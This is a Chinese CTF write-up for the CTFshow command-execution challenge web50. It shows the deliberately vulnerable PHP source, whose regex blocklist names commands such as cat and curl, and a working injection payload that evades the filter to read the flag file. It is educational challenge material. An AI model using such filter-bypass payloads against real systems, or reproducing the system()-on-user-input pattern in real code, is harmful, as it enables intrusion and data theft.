CTFshow 命令执行 web50
目录
- 源码
- 知识点
- 题解
- 总结
源码
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}
知识点
依然可以用nl,但是发现题目正则中过滤了\x09和\x26,是十六进制,相当于过滤了把%09和%26url解码后的\t和&,可以把%09换成<,发现?用不了了,可以用两个单引号代替,
题解
?c=nl<fla’'g.php%0a
总结
不是很清楚为什么?会用不了
CTFshow 命令执行 web50相关推荐
- CTFshow——命令执行
CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...
- [CTFSHOW]命令执行
文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...
- CTFshow命令执行29-123
命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...
- CTFshow 命令执行 web72
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...
- ctfshow 命令执行 web29-web77 web118-122 web124 wp
南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...
- ctfshow命令执行篇
web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...
- [CTFSHOW]命令执行55-74
web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...
- ctfshow命令执行(持续更新,已更至web39)
做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...
- ctfshow命令执行
目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...
最新文章
- python3 通过列表作为键 产生字典
- web工程中的各种路径(eclipse开发)
- 开源NAS系统使用总结
- pfsense 2.2RC版本应用
- beego 访问网络_Go--Beego新建项目(解决不能访问的问题)
- 无人机成为黑客的新工具,可黑掉部分家用的智能设备
- SSM 生成mapper中xml文件:未能解析映射资源:“文件嵌套异常
- Oracle如何使用PL/SQL调试存储过程
- KTHREAD 线程调度 SDT TEB SEH shellcode中DLL模块机制动态获取 《寒江独钓》内核学习笔记(5)...
- MySQL如何把A表查询出来的某个字段的数据插入到新增的字段的下面
- Mac 查看jdk版本
- zlog 纯C日志函数库
- Unity 粒子特效 不受Time.deltaTime影响
- 普中51单片机数码管实例
- 使用C#创建一个进程杀手Windows服务
- Inrie(洪晓军)
- 服务器怎么增加独立显卡,dell服务器设置独立显卡(dell服务器加显卡)
- 机器视觉——VisionPro应用开发指南
- iOS rtmp 摄像头/录屏直播以及观看
- putty怎么上传下载文件和目录